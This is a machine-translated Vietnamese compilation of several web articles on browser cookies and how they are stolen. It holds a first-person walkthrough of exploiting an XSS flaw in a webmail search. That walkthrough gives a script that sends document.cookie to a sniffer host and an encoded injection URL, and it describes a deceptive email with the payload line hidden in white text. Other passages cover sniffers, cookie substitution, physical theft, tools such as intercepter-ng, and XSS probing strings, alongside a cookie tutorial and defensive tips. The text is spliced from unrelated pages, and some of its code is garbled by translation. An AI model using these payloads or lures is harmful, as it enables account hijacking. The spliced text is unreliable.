Mật khẩu được lưu trong trình duyệt từ cookie. Một cách dễ dàng để ăn cắp cookie. Truy cập vật lý vào dữ liệu

Trong đó người ta đề xuất tham dự một sự kiện miễn phí dành riêng cho các vấn đề bảo mật thông tin. Vì sự kiện được tổ chức tại thành phố của tôi nên tôi quyết định rằng mình chắc chắn cần phải đến đó. Bài học đầu tiên được dành cho các lỗ hổng trên các trang web như XSS. Sau bài học, tôi quyết định rằng mình cần củng cố những kiến ​​thức đã học trong điều kiện thực tế. Tôi đã chọn một số trang web liên quan đến thành phố của mình và bắt đầu cố gắng chèn tập lệnh của mình vào tất cả các biểu mẫu. Trong hầu hết các trường hợp, tập lệnh đã được lọc ra. Nhưng tình cờ là “cảnh báo” được kích hoạt và tin nhắn của tôi xuất hiện. Tôi đã báo cáo lỗ hổng được tìm thấy cho quản trị viên và họ đã nhanh chóng khắc phục mọi thứ.

Vào một ngày nọ, khi đang kiểm tra thư mới nhất trên mail.ru, tôi chợt chú ý đến một biểu mẫu tìm kiếm thư trong hộp thư. Thỉnh thoảng tôi sử dụng tính năng tìm kiếm này để tìm thứ gì đó tôi cần trong đống thư cũ của mình. Chà, vì trong vài ngày qua, tôi đã chèn “cảnh báo” của mình ở hầu hết mọi nơi có thể, theo phản xạ, tay tôi với tới biểu mẫu tìm kiếm này. Tôi đã nhập mã cho tập lệnh của mình và nhấn Enter. Hãy tưởng tượng sự ngạc nhiên của tôi khi nhìn thấy một tin nhắn quen thuộc đến đau lòng trên màn hình...


Tại bài giảng Open InfoSec Days, diễn giả cho biết các lập trình viên khá nghi ngờ về những lỗ hổng kiểu này, nói rằng “cảnh báo? Vâng, vậy thì sao? Điều này không nguy hiểm". Nếu trên các trang web khác, tôi chỉ hài lòng với cửa sổ này với thông báo của mình, thì trong trường hợp này, tôi quyết định đi xa hơn và hiển thị những gì có thể xảy ra từ một “cảnh báo” như vậy.

Vì vậy, tập lệnh hoạt động, nghĩa là có lỗ hổng. Vì vậy, bạn có thể thử chạy một số tập lệnh khác. Ví dụ: tập lệnh gửi cookie của người dùng khác cho chúng tôi. Để tập lệnh hoạt động, chúng tôi cần buộc người dùng thực thi tập lệnh của mình. Điều này có thể được thực hiện bằng cách gửi cho anh ta một lá thư có liên kết thích hợp, sau khi nhấp vào hộp thư đó sẽ được tìm kiếm và mã chúng ta cần sẽ được thực thi.

Phải mất một thời gian và rất nhiều thử nghiệm để hiểu được cơ chế của lỗ hổng bảo mật. Đôi khi kịch bản hoạt động, đôi khi nó bị lọc ra. Sau một số nỗ lực, người ta xác định bằng thực nghiệm rằng tập lệnh chỉ hoạt động 100% nếu việc tìm kiếm các chữ cái cho kết quả khả quan. Nghĩa là, khi người dùng thực hiện tìm kiếm bằng tập lệnh của chúng tôi, điều cần thiết là phải tìm thấy ít nhất một chữ cái trong hộp thư của anh ta theo các tham số đã cho. Không khó để sắp xếp việc này.

Ngoài ra, thay vì “cảnh báo”, chúng tôi cần một tập lệnh sẽ chuyển cookie đến trình thám thính của chúng tôi. Chúng tôi sẽ viết tập lệnh này vào một tệp riêng và tải nó vào tìm kiếm của chúng tôi. Tôi đã tạo một tệp test.js với mã cần thiết và tải nó lên hosting. Mã kịch bản là như thế này:

Img=Hình ảnh mới();
img.src="http://sitename.ru/sniff.php?cookie="+document.cookie;
hàm F() (
vị trí="http://www.solife.ru";
}
setTimeout(F, 5000);

Điều tôi muốn làm rõ ở đây. Hãy đặt mình vào vị trí của kẻ tấn công. Chúng tôi cần người dùng nhấp vào liên kết. Làm thế nào tôi có thể buộc anh ấy làm điều này? Bạn có thể hứa hẹn hàng núi vàng và để nhận được chúng, bạn cần theo liên kết của chúng tôi đến trang web. Nhưng tôi không nghĩ nó sẽ hiệu quả. Mọi người không còn mắc phải điều này nữa (bản thân tôi liên tục xóa những bức thư như vậy mà không hề đọc chúng). Vì vậy, chúng ta sẽ lợi dụng lòng thương xót của con người, vì nó vẫn tồn tại trong tự nhiên. Chúng tôi yêu cầu bạn bỏ phiếu trên trang web để cứu các loài động vật có nguy cơ tuyệt chủng. Đầu tiên, chúng tôi sẽ lấy cookie và sau đó chúng tôi sẽ chuyển hướng người dùng đến trang bỏ phiếu. Thời gian chờ để chuyển hướng được đặt thành 5 giây, nếu không, cookie đơn giản là không có thời gian để chuyển sang trình đánh hơi và người dùng ngay lập tức được chuyển hướng đến một trang web về động vật. Thay vì “cảnh báo”, tôi đã sử dụng đoạn mã sau:

Khi viết xong kịch bản, tôi bắt đầu viết thư. Tôi đã nghĩ ra một cái gì đó như thế này:


Hóa ra nó khá hoài nghi, nhưng tôi đã cố gắng đưa các điều kiện càng gần với thực tế càng tốt. Ở cuối bức thư có một dòng chữ viết, mục đích này để chúng ta tìm thấy bức thư của chúng ta khi tìm kiếm. Để dòng này không gây ra những câu hỏi không cần thiết, tôi đã sơn nó màu trắng. Tôi cũng đặt một khoảng trắng trong từ “http” để chuỗi này không bị nhận dạng và chuyển thành liên kết. Mặt khác, mặc dù thực tế là dòng script được viết bằng phông chữ màu trắng, nhưng liên kết sẽ được người nhận đánh dấu bằng màu xanh lam và chúng tôi không cần điều này. Tìm kiếm thông minh sẽ vẫn tìm và nhận ra chuỗi này, bất chấp khoảng trắng.

E.mail.ru/cgi-bin/gosearch?q_folder=0&q_query=%27%3E%3Cscript%20src%3D%27http%3A%2F%2Fsitename.ru%2Ftest.js%27%3E%3C%2Fscript%3E

Tôi đã sử dụng mã hóa URL cho tập lệnh để không có gì bị lọc ra. Tôi cũng đã thêm tham số “q_folder=0” cho tìm kiếm để tìm kiếm diễn ra trong thư mục “Hộp thư đến”.

Bức thư đã sẵn sàng, chúng tôi gửi nó. Tôi đã sử dụng hộp thư thứ hai của mình trên cùng dịch vụ với người nhận. Hãy xem điều gì đã xảy ra với chiếc hộp kia.

Văn bản tập lệnh của chúng tôi không hiển thị vì nó hòa vào nền. Hãy nhấp vào liên kết và xem điều gì sẽ xảy ra. Người dùng được chuyển đến kết quả tìm kiếm email dựa trên tham số chúng tôi đã chỉ định. Thư của chúng tôi mà chúng tôi đã gửi sẽ hiển thị trong kết quả tìm kiếm. Tại thời điểm này, tập lệnh của chúng tôi đã hoạt động và gửi cookie của người dùng đến trình thám thính. Sau 5 giây (thời gian tùy thuộc vào cài đặt tập lệnh), người dùng sẽ được chuyển hướng đến trang bỏ phiếu.

Tôi kiểm tra tệp sniff.txt của mình:

Vì mục tiêu của tôi không phải là trộm hộp của người khác hay giành quyền truy cập vào chúng nên tôi sẽ kết thúc câu chuyện ở đây. Nhưng về mặt lý thuyết, bạn có thể thay thế cookie của mình bằng cookie của người khác và có quyền truy cập vào hộp thư của người khác. Nói chung, nếu kẻ tấn công quan tâm đến mục tiêu, hắn sẽ tìm thấy cách sử dụng thông tin nhận được.

Tôi xin cảm ơn Sergei Belov (

Có lẽ nên bắt đầu với việc cookie là gì và chúng cần thiết để làm gì. Cookie là một phần dữ liệu có thể được lưu trữ ở phía người dùng và được sử dụng sau này để thực hiện ý tưởng của họ.

Hãy tưởng tượng rằng trên trang web của bạn, bạn có cơ hội chọn bảng màu của trang web. Sẽ rất thuận tiện khi thực hiện điều này trên cookie vì chủ đề anh ấy chọn sẽ chỉ hiển thị với anh ấy.

Cookie tồn tại trong cả PHP và jQuery. Vì vậy, chúng tôi sẽ xem xét từng trường hợp chi tiết hơn.

Hướng dẫn chi tiết làm việc với Cookies trong jQuery

1. Cài đặt cookie

Bây giờ chúng ta có thể thử tạo cookie đầu tiên của mình:

$.cookie("cookie_name", "cookie_value", ( hết hạn: 3, đường dẫn: "/", tên miền: "your_site.ru", an toàn: true ));

Cái gì ở đây?

“cookie_name” – tên cookie;

“cookie_value” – giá trị cookie;

“hết hạn” – số ngày cookie sẽ được lưu trữ (trong trường hợp của chúng tôi – 3 ngày). Sau thời gian này, cookie sẽ tự động bị xóa;

“đường dẫn” – tính khả dụng của cookie trên trang web (trong trường hợp của chúng tôi là “/” - có sẵn trên toàn bộ trang web). Nếu muốn, bạn chỉ có thể chỉ định một trang hoặc phần cụ thể sẽ có sẵn cookie, ví dụ: “/audio/rock”;

“tên miền” – tên miền mà cookie hợp lệ. Nếu bạn có tên miền phụ, bạn có thể chỉ định tên miền đó trong tham số này, ví dụ: “tên miền: “subdomain.your_site.ru”” và trong trường hợp này, cookie sẽ chỉ khả dụng trên tên miền “subdomain.your_site.ru”;

“ bảo mật" – một tham số chỉ ra rằng cookie phải được truyền qua giao thức https an toàn.

Ở đây, không phải tất cả các tham số đều bắt buộc và để đặt cookie, cấu trúc này là đủ:

$.cookie("cookie_name", "cookie_value", ( hết hạn: 3, đường dẫn: "/" ));

2. Nhận Cookie

Việc lấy cookie khá đơn giản; bạn có thể thực hiện việc này bằng mã:

$.cookie("cookie_name");

Mã này có thể được gán cho một biến và được sử dụng cho nhu cầu của bạn:

var content = $.cookie("cookie_name"); if(content != null) ( Alert("Cookie tồn tại!"); ) else ( Alert("Cookie không tồn tại!"); )

Đồng ý, điều này rất thuận tiện.

3. Xóa cookie

Để xóa giá trị cookie, hãy đặt giá trị đó thành "null":

$.cookie("cookie_name", null);

Tôi nghĩ đây là phần kết thúc phần giới thiệu về cách làm việc với Cookies trong jQuery. Kiến thức này là khá đủ để thực hiện ý tưởng của bạn.

Hướng dẫn chi tiết làm việc với Cookies trong PHP

Không giống như tùy chọn trước đây để làm việc với cookie, bạn không cần kết nối bất cứ thứ gì ở đây.

1. Cài đặt cookie

Để đặt cookie trong PHP, chúng tôi sẽ sử dụng chức năng “setcookie” tích hợp sẵn:

Cái gì ở đây?

“cookie_name” – tên cookie;

“cookie_value” – giá trị cookie;

“time()+3600” – thời gian tồn tại của cookie tính bằng giây (trong trường hợp của chúng tôi – 1 giờ). Nếu bạn đặt thời gian tồn tại thành “0”, cookie sẽ bị xóa ngay khi đóng trình duyệt;

“/” – phần có sẵn cookie (trong trường hợp của chúng tôi là có sẵn trên toàn bộ trang web). Nếu bạn muốn giới hạn phần có sẵn cookie, thì hãy thay thế “/” bằng, ví dụ: “/audio/rock”;

“your_site.ru” – tên miền nơi cookie sẽ có sẵn;

“true” – một tham số cho biết cookie chỉ khả dụng thông qua giao thức https an toàn. Nếu không thì giá trị là sai;

“false” – một tham số cho biết rằng cookie có sẵn cho các ngôn ngữ tập lệnh. Ngược lại – đúng (chỉ khả dụng qua http).

Ở đây cũng vậy, không phải tất cả các tham số đều bắt buộc và để tạo cookie, bạn chỉ cần cấu trúc sau:

Để thuận tiện, giá trị cookie có thể được đặt thông qua một biến:

2. Nhận Cookie

Để nhận cookie, bạn cần sử dụng:

$_COOKIE["cookie_name"];

Để loại bỏ lỗi do có thể thiếu cookie, hãy sử dụng:

Như trong ví dụ trước về làm việc với Cookie trong jQuery, cookie có thể được gán cho một biến:

3. Xóa cookie

Xóa cookie trong PHP cũng dễ dàng như trong jQuery. Tất cả những gì bạn phải làm là đặt cookie thành giá trị trống và thời gian âm (thời gian đã trôi qua):

Setcookie("cookie_name", "", time() - 3600);

Thời gian trong ví dụ này là một giờ trước, khá đủ để xóa cookie.

Tôi muốn lưu ý rằng trong một số trường hợp, việc sử dụng cookie hợp lý hơn nhiều so với việc sử dụng cơ sở dữ liệu để triển khai các chức năng cần thiết.

Bánh quy- thông tin dưới dạng tệp văn bản được trang web lưu trên máy tính của người dùng. Chứa dữ liệu xác thực (đăng nhập/mật khẩu, ID, số điện thoại, địa chỉ hộp thư), cài đặt người dùng, trạng thái truy cập. Được lưu trữ trong hồ sơ trình duyệt.

Hack cookie là hành vi trộm cắp (hoặc "chiếm quyền điều khiển") phiên của khách truy cập tài nguyên web. Thông tin cá nhân không chỉ được cung cấp cho người gửi và người nhận mà còn cho bên thứ ba - người thực hiện việc chặn.

Công cụ và kỹ thuật hack cookie

Những tên trộm máy tính, giống như đồng nghiệp của chúng ngoài đời, ngoài kỹ năng, sự khéo léo và kiến ​​thức, tất nhiên chúng còn có những công cụ riêng - một loại kho vũ khí gồm các chìa khóa chính và đầu dò. Hãy cùng điểm qua những thủ thuật phổ biến nhất mà hacker sử dụng để trích xuất cookie từ người dùng Internet.

người đánh hơi

Các chương trình đặc biệt để theo dõi và phân tích lưu lượng mạng. Tên của họ xuất phát từ động từ tiếng Anh “sniff” (đánh hơi), bởi vì. theo nghĩa đen là "đánh hơi" các gói được truyền giữa các nút.

Nhưng những kẻ tấn công sử dụng trình thám thính để chặn dữ liệu phiên, tin nhắn và thông tin bí mật khác. Mục tiêu tấn công của chúng chủ yếu là các mạng không được bảo vệ, trong đó cookie được gửi trong phiên HTTP mở, tức là chúng thực tế không được mã hóa. (Wi-Fi công cộng dễ bị tổn thương nhất về mặt này.)

Để nhúng một sniffer vào kênh Internet giữa nút người dùng và máy chủ web, các phương pháp sau được sử dụng:

  • “lắng nghe” các giao diện mạng (hub, switch);
  • phân nhánh và sao chép lưu lượng truy cập;
  • kết nối với khoảng cách kênh mạng;
  • phân tích thông qua các cuộc tấn công đặc biệt chuyển hướng lưu lượng truy cập của nạn nhân đến trình thám thính (giả mạo MAC, giả mạo IP).

XSS viết tắt là viết tắt của Cross Site Scripting. Được sử dụng để tấn công các trang web nhằm đánh cắp dữ liệu người dùng.

Nguyên tắc của XSS như sau:

  • kẻ tấn công chèn mã độc (một tập lệnh được ngụy trang đặc biệt) vào trang web của trang web, diễn đàn hoặc vào tin nhắn (ví dụ: khi tương tác trên mạng xã hội);
  • nạn nhân truy cập trang bị nhiễm và kích hoạt mã đã cài đặt trên PC của mình (nhấp chuột, theo liên kết, v.v.);
  • Ngược lại, mã độc được thực thi sẽ “trích xuất” dữ liệu bí mật của người dùng từ trình duyệt (đặc biệt là cookie) và gửi nó đến máy chủ web của kẻ tấn công.

Để “cấy ghép” cơ chế XSS của phần mềm, tin tặc sử dụng đủ loại lỗ hổng trong máy chủ web, dịch vụ trực tuyến và trình duyệt.

Tất cả các lỗ hổng XSS được chia thành hai loại:

  • Thụ động. Cuộc tấn công có được bằng cách yêu cầu một tập lệnh cụ thể trên một trang web. Mã độc hại có thể được đưa vào nhiều dạng khác nhau trên một trang web (ví dụ: vào thanh tìm kiếm của trang web). Dễ bị XSS thụ động nhất là các tài nguyên không lọc thẻ HTML khi dữ liệu đến;
  • Tích cực. Nằm trực tiếp trên máy chủ. Và chúng được kích hoạt trong trình duyệt của nạn nhân. Chúng được những kẻ lừa đảo tích cực sử dụng trong tất cả các loại blog, cuộc trò chuyện và nguồn cấp tin tức.

Hacker cẩn thận “ngụy trang” các tập lệnh XSS của mình để nạn nhân không nghi ngờ điều gì. Họ thay đổi phần mở rộng của tệp, chuyển mã dưới dạng hình ảnh, thúc đẩy họ nhấp vào liên kết và thu hút họ bằng nội dung thú vị. Kết quả là: một người dùng PC, không thể kiểm soát sự tò mò của mình, đã tự tay (bằng một cú click chuột) gửi cookie phiên (có thông tin đăng nhập và mật khẩu!) Cho tác giả của tập lệnh XSS - kẻ phản diện máy tính.

Thay thế cookie

Tất cả cookie đều được lưu và gửi đến máy chủ web (từ đó chúng “đến”) mà không có bất kỳ thay đổi nào - ở dạng ban đầu - với cùng giá trị, chuỗi và dữ liệu khác. Việc cố ý sửa đổi các tham số của chúng được gọi là thay thế cookie. Nói cách khác, khi thay thế cookie, kẻ tấn công giả vờ mơ tưởng. Ví dụ: khi thực hiện thanh toán trong cửa hàng trực tuyến, cookie sẽ thay đổi số tiền thanh toán xuống - do đó, việc "tiết kiệm" khi mua hàng xảy ra.

Cookie phiên bị đánh cắp trên mạng xã hội từ tài khoản của người khác sẽ được “chèn” vào một phiên khác và trên một PC khác. Chủ sở hữu của các cookie bị đánh cắp có toàn quyền truy cập vào tài khoản của nạn nhân (thư từ, nội dung, cài đặt trang) miễn là cô ấy ở trên trang của mình.

Cookie "Chỉnh sửa" được thực hiện bằng cách sử dụng:

  • Chức năng “Quản lý cookie…” trong trình duyệt Opera;
  • Tiện ích bổ sung Trình quản lý cookie và Trình quản lý cookie nâng cao cho FireFox;
  • Tiện ích IECookiesView (chỉ dành cho Internet Explorer);
  • một trình soạn thảo văn bản như AkelPad, NotePad hoặc Windows Notepad.
Truy cập vật lý vào dữ liệu

Một sơ đồ thực hiện rất đơn giản, bao gồm một số bước. Nhưng nó chỉ hiệu quả nếu máy tính của nạn nhân có phiên mở, chẳng hạn như VKontakte, không được giám sát (và trong một thời gian dài!):

  • Một hàm javascript được nhập vào thanh địa chỉ của trình duyệt để hiển thị tất cả các cookie đã lưu.
  • Sau khi nhấn “ENTER” tất cả chúng đều xuất hiện trên trang.
  • Cookie được sao chép, lưu vào một tệp và sau đó được chuyển sang ổ đĩa flash.
  • Trên một PC khác, cookie được thay thế trong phiên mới.
  • Quyền truy cập vào tài khoản của nạn nhân được cấp.
  • Theo quy định, tin tặc sử dụng kết hợp các công cụ trên (+ các công cụ khác) (vì mức độ bảo vệ trên nhiều tài nguyên web khá cao) và riêng biệt (khi người dùng quá ngây thơ).

    XSS + trình thám thính
  • Một tập lệnh XSS được tạo, chỉ định địa chỉ của trình thám thính trực tuyến (có thể là dịch vụ tự tạo hoặc dịch vụ cụ thể).
  • Mã độc được lưu với đuôi .img (định dạng hình ảnh).
  • Tập tin này sau đó được tải lên một trang web, cuộc trò chuyện hoặc tin nhắn cá nhân - nơi cuộc tấn công sẽ được thực hiện.
  • Sự chú ý của người dùng bị thu hút vào “cái bẫy” được tạo ra (đây là lúc kỹ thuật xã hội phát huy tác dụng).
  • Nếu bẫy được kích hoạt, cookie từ trình duyệt của nạn nhân sẽ bị kẻ đánh hơi chặn lại.
  • Kẻ tấn công mở nhật ký của trình thám thính và lấy lại các cookie bị đánh cắp.
  • Tiếp theo, nó thực hiện thay thế để có được quyền của chủ tài khoản bằng các công cụ trên.
  • Bảo vệ cookie khỏi bị hack
  • Sử dụng kết nối được mã hóa (sử dụng các giao thức và phương pháp bảo mật thích hợp).
  • Không trả lời các liên kết, hình ảnh đáng ngờ hoặc những lời đề nghị hấp dẫn để làm quen với “phần mềm miễn phí mới”. Đặc biệt là từ người lạ.
  • Chỉ sử dụng các tài nguyên web đáng tin cậy.
  • Kết thúc phiên được ủy quyền bằng cách nhấp vào nút “Đăng xuất” (không chỉ đóng tab!). Đặc biệt nếu bạn đăng nhập vào tài khoản của mình không phải từ máy tính cá nhân mà chẳng hạn từ PC trong quán cà phê Internet.
  • Không sử dụng tính năng "Lưu mật khẩu" của trình duyệt. Dữ liệu đăng ký được lưu trữ làm tăng nguy cơ trộm cắp đáng kể. Đừng lười biếng, đừng lãng phí vài phút nhập mật khẩu và đăng nhập vào đầu mỗi phiên.
  • Sau khi lướt web - truy cập mạng xã hội, diễn đàn, trò chuyện, trang web - xóa cookie đã lưu và xóa bộ nhớ đệm của trình duyệt.
  • Thường xuyên cập nhật trình duyệt và phần mềm diệt virus.
  • Sử dụng các tiện ích mở rộng của trình duyệt để bảo vệ khỏi các cuộc tấn công XSS (ví dụ: NoScript cho FF và Google Chrome).
  • Định kỳ trong tài khoản.
  • Và quan trọng nhất, đừng mất cảnh giác và chú ý khi thư giãn hoặc làm việc trên Internet!

    Một người bạn của tôi quên mật khẩu của một trang web. Tuy nhiên, trước đó anh ấy đã chọn hộp kiểm “Ghi nhớ tôi” trong trình duyệt Google Chrome khi đăng nhập, điều này cho phép anh ấy truy cập trang web bằng tài khoản của mình. Tôi nhận được câu hỏi liệu có thể chuyển trạng thái kỳ diệu này sang máy tính khác hay không. Tất nhiên, thay đổi hoặc khôi phục mật khẩu sẽ đúng hơn, nhưng bạn tôi không thể làm điều này vì những lý do không liên quan đến vụ việc.

    Cách sử dụng đánh chặn-ng cho người giả

    Mặc dù có nhiều phần mềm hiện đại để lựa chọn nhưng rất khó tìm được chương trình hack nào tốt hơn cho Android hơn là chặn. Tiêu chí đầu tiên ủng hộ sản phẩm này chính là hiệu quả thực tế của nó. Hầu hết các công cụ đánh hơi được cung cấp trên mạng chỉ là hàng nhái không thực hiện các chức năng đã nêu của chúng.

    Các yếu tố tích cực tiếp theo là tính linh hoạt của ứng dụng và độ phủ sóng của nhiều đối tượng người dùng.

    Trợ giúp máy tính 939-29-71

    Hãy bắt đầu theo thứ tự. Cookie hay "cookie" là những tệp văn bản rất nhỏ - dấu trang chứa thông tin.

    Máy chủ web truyền thông tin này đến trình duyệt của người dùng. nơi thông tin này được lưu trữ cho đến khi được yêu cầu. Không rõ ràng lắm. Tốt. Khỏe.

    Tôi sẽ cố gắng làm cho nó đơn giản hơn nữa. Nhìn. bạn đã đăng ký trên bất kỳ trang web nào.

    Tại thời điểm đăng ký, những “cookie” này sẽ được tạo.

    Đó là những gì họ đang có.

    Người làm bánh quy

    Chương trình lắng nghe lưu lượng truy cập trên mạng WiFi, chặn cookie và sao chép phiên của người dùng trong trình duyệt của bạn, lặp lại các yêu cầu bằng thông tin xác thực của người đó. Tác giả Matthew Sullivan đã trình bày về chương trình vào ngày 30 tháng 9 tại hội nghị hacker Derbycon. Ngay trong bài phát biểu, Matthew Sullivan đã chặn phiên không bảo mật với Google của một trong những khách tham dự hội nghị qua WiFi.

    Cách ăn cắp cookie

    Nếu khi đang truy cập một trang web, bạn nhập văn bản sau vào thanh địa chỉ của trình duyệt Firefox hoặc Opera: javaсript:document.write(document.cookie); sau đó bạn sẽ thấy nội dung như: remixAdminsBar=0; phối lạiGroupType=0; remixpass=******************; tường phối lại=0; phối lạiThông tin=0; phối lạiMembersBar=0; mô tả phối lại=0; remixautobookmark=8; email phối lại=*******; remixmid=23363; phối lạichk=5; remixaudios=0; remixlinksBar=1; phối lạiOfficersBar=0; phối lạiPhotosBar=0; phối lạiTopicsBar=0; video phối lại=0; remixRecentNews=0; remixAlbumsBar=0 Chú ý! .

    Hướng dẫn đầy đủ về Cross-Site Scripting

    XSS là một loại lỗ hổng phần mềm có nguồn gốc từ các ứng dụng Web, cho phép kẻ tấn công đưa tập lệnh phía máy khách vào các trang Web được người dùng khác xem. Wikipedia định nghĩa XSS như sau: “Kịch bản chéo trang (XSS) là một loại lỗ hổng phần mềm gốc. vào Web. -applications (bằng cách bỏ qua các hạn chế bảo mật của trình duyệt)”, cho phép kẻ tấn công đưa tập lệnh máy khách vào các trang web được người dùng khác xem.

    Sự khác biệt giữa cookie và phiên

    Cách đây không lâu tôi đã viết một bài viết về cách đăng ký và phân quyền người dùng trên một trang web.

    ". Trong bài viết này tôi sẽ phân tích sự khác biệt giữa phiên và cookie. để cuối cùng bạn có thể đưa ra lựa chọn của mình.

    Bánh quy. Không, vấn đề không phải là về cookie mà là về sự an toàn của bạn. Vì vậy, bạn truy cập trang web yêu thích của mình “vkontakte” (hoặc, ví dụ: xem thư) trên máy tính của người khác, từ chối tùy chọn “lưu mật khẩu”, vui vẻ xem qua thư và rời đi. Và đừng nghĩ đến việc bây giờ bạn có thể đăng nhập vào mạng xã hội hoặc gửi email dưới tên của mình.

    Tôi thậm chí còn không xem xét tình huống có một chương trình ghi nhớ mật khẩu mà bạn không biết. Đây đã là một vụ hack có chủ ý và bạn có thể sẽ nghi ngờ rằng điều gì đó như thế này có thể xảy ra và bạn sẽ không truy cập trang web yêu thích của mình trên một máy tính như vậy. Nhưng chúng ta có thể nói về sự tò mò đơn giản của con người - bạn đang đi thăm bạn bè và rồi đột nhiên họ có cơ hội đọc thư của bạn. Bạn có chắc họ sẽ từ chối cơ hội này? Bạn không sợ điều gì đó sẽ lộ ra sao? Trong mọi trường hợp, tôi sẽ đặt câu hỏi về đạo đức sang một bên và chỉ nói về cách lưu trữ thông tin trên máy tính mà giờ đây bạn có thể được phép vào một số trang web mà không cần yêu cầu mật khẩu.

    cách ăn trộm Cookie

    Và tên của công nghệ này là cookie.

    Và đây là nơi mọi chuyện bắt đầu. Giao thức http, qua đó bạn thực sự xem các trang web (bao gồm cả trang này), ban đầu không cung cấp khả năng duy trì kết nối. Nói một cách đại khái, bạn gửi yêu cầu đến trang web, nhận được phản hồi, nó hiển thị trên màn hình và sau đó máy chủ không nhớ bất cứ điều gì về bạn. Tất nhiên, điều này là tốt khi trang web chỉ cung cấp thông tin thuần túy và không nên nhớ bất cứ điều gì về bạn, nhưng chúng ta đang sống trong thời đại Web 2.0 😉 Sự phát triển tự nhiên của giao thức là các yêu cầu POST và GET, khi bạn gửi một số dữ liệu, máy chủ có thể ghi nó vào dữ liệu cơ sở dữ liệu, nhưng điều này là chưa đủ.

    Hãy xem một ví dụ rất đơn giản. Diễn đàn. Vì vậy, bạn đã đăng ký và có một bài đăng trên diễn đàn rằng có một người dùng như vậy với mật khẩu như vậy và một số dữ liệu bổ sung khác. Nhưng bây giờ bạn vào diễn đàn và đăng nhập - nhập mật khẩu của bạn. Ở đâu đó cần có thông tin mà bạn đã đăng nhập. Trên máy chủ? Dĩ nhiên là không! Không thể lưu trữ thông tin trên máy chủ mà ủy quyền được thực hiện từ máy tính của bạn - nó sẽ không thể phân biệt bạn với người khác (ngay cả địa chỉ IP của bạn cũng không nhận dạng duy nhất bạn)! Vì vậy, thông tin ủy quyền đã xảy ra phải được lưu trữ trên máy tính của bạn. Đó là mục đích của cookie, đó là mục đích chúng được tạo ra.

    Cookie là một bản ghi nhỏ trên máy tính của bạn lưu trữ thông tin về trang web bạn đã truy cập. Khi bạn đăng nhập, một mục tương tự sẽ được tạo, sau đó bạn có thể dạo quanh diễn đàn và nó sẽ nhận ra bạn. Tuy nhiên, điều này sẽ tự động xảy ra - nhờ thông tin được lưu trữ trong cookie - vì vậy việc giả vờ rằng bạn là quản trị viên chính của diễn đàn sẽ vẫn không hiệu quả khi bỏ qua việc kiểm tra mật khẩu.

    Bây giờ chúng ta có thể quay lại nơi bài viết này bắt đầu. Nếu bạn đã đăng nhập ở đâu đó mà không lưu mật khẩu, có thể xảy ra trường hợp một mục nhập đã được tạo trên máy tính hiện cho phép bạn đăng nhập vào tài nguyên này dưới tên của bạn mà không được phép. Bản thân một mục như vậy sẽ trở nên lỗi thời sau một thời gian, nhưng bạn có thể buộc xóa nó. Mỗi trình duyệt thực hiện việc này một cách khác nhau, tôi sẽ chỉ cho bạn cách thực hiện việc này trong Google Chrome yêu thích của tôi. Mở các thông số

    Chuyển đến tab “nâng cao” và tìm nút “hiển thị cookie”

    Tất nhiên, bây giờ bạn có thể xóa tất cả cookie, nhưng điều này có thể khiến chủ sở hữu máy tính khó chịu. Do đó, ví dụ: ở trường trên cùng, bạn có thể nhập tên của trang web bạn quan tâm

    Sau đó, bạn chỉ có thể xóa các cookie liên quan đến trang web này. Bạn có thể thử nó trên của tôi. Tuy nhiên, nếu bạn đăng nhập vào diễn đàn của tôi và sau đó xóa cookie, thông tin đăng nhập sẽ bị quên. Thử nó!

    bình luận được cung cấp bởi

    1. XSS là gì?
    Lỗ hổng XSS cho phép chèn mã javascript tùy ý vào nội dung trang. Cuộc tấn công XSS khác với các cuộc tấn công khác (ví dụ: SQL SQL hoặc PHP) ở chỗ nó ảnh hưởng đến máy khách chứ không phải máy chủ.

    cách ăn trộm cookie

    Với sự trợ giúp của nó, bạn không thể xem các bảng cơ sở dữ liệu, tải shell, v.v. Việc sử dụng XSS phổ biến nhất là đánh cắp cookie.
    Cookie là một phần dữ liệu nhỏ được tạo bởi máy chủ web và được lưu trữ trên máy tính của người dùng dưới dạng tệp. Thông thường, cookie được sử dụng để lưu trữ tài khoản và thường chứa mật khẩu, thông tin đăng nhập và ID phiên được mã hóa (mặc dù không phải lúc nào cũng vậy)
    XSS có hai loại, chủ động và thụ động.

    XSS thụ động yêu cầu nạn nhân phải tương tác trực tiếp, chẳng hạn như nhấp vào liên kết chứa mã javascript. Khi sử dụng loại XSS này, bạn không thể thiếu SI (Social Engineering)

    XSS hoạt động không yêu cầu nạn nhân tham gia; tất cả những gì họ cần làm là truy cập trang chứa XSS. Ví dụ: XSS hoạt động có thể có trong tin nhắn trên diễn đàn, trò chuyện, thêm tin tức, v.v.

    2.Tìm kiếm XSS
    Trong đoạn này tôi sẽ cho bạn biết cách tìm xss

    2.1.XS thụ động
    Để tìm XSS thụ động, chỉ cần thay thế cảnh báo ('xss') vào biểu mẫu đầu vào, nếu tập lệnh hoạt động và thông báo "xss" xuất hiện thì có nghĩa là có lỗ hổng, nếu tập lệnh không hoạt động, bạn cũng có thể thử ">alert (), đây có lẽ là lỗ hổng xss phổ biến nhất. Nếu cả tập lệnh này và tập lệnh khác đều không hoạt động thì rất có thể không có lỗ hổng nào.
    Hãy xem một ví dụ.
    http://miss.rambler.ru/srch/?sort=0& … amp;words=
    Bạn có thấy biểu mẫu "tìm kiếm" không? chèn ">alert()" vào đó và nhấp vào "tìm"
    Một cửa sổ có xss xuất hiện nghĩa là xss đã có mặt (Có lẽ khi bạn đọc bài viết này thì xss này đã bị xóa rồi)

    2.2.XS hoạt động
    Ví dụ, css như vậy có thể có trong các trường hồ sơ, khi thêm tin tức vào tiêu đề của tin tức và trong chính tin tức đó (ít thường xuyên hơn), trong các tin nhắn trên diễn đàn/phòng trò chuyện/phòng khách có bật html. Mọi thứ ở đây đều đơn giản, chúng tôi nhập tập lệnh từ đoạn trước vào các trường và nếu thông báo hiển thị trên màn hình thì có nghĩa là lỗ hổng đã xuất hiện.
    Hãy cùng xem xss trong thẻ BB trên diễn đàn nhé.
    Bạn có thể thử chèn mã javascript vào thẻ, ví dụ như thế này:
    javascript:cảnh báo('xss')
    Một số thẻ có tham số, ví dụ thẻ có tham số dynsrc và lowsrc, hãy thử thay thế mã như thế này:
    http://www.site.ru/image.jpg dynsrc=javascript:alert('xss')
    Nếu tập lệnh hoạt động, xss có ở đó

    3.Sử dụng XSS để đánh cắp Cookie
    Bây giờ là ngon nhất))))
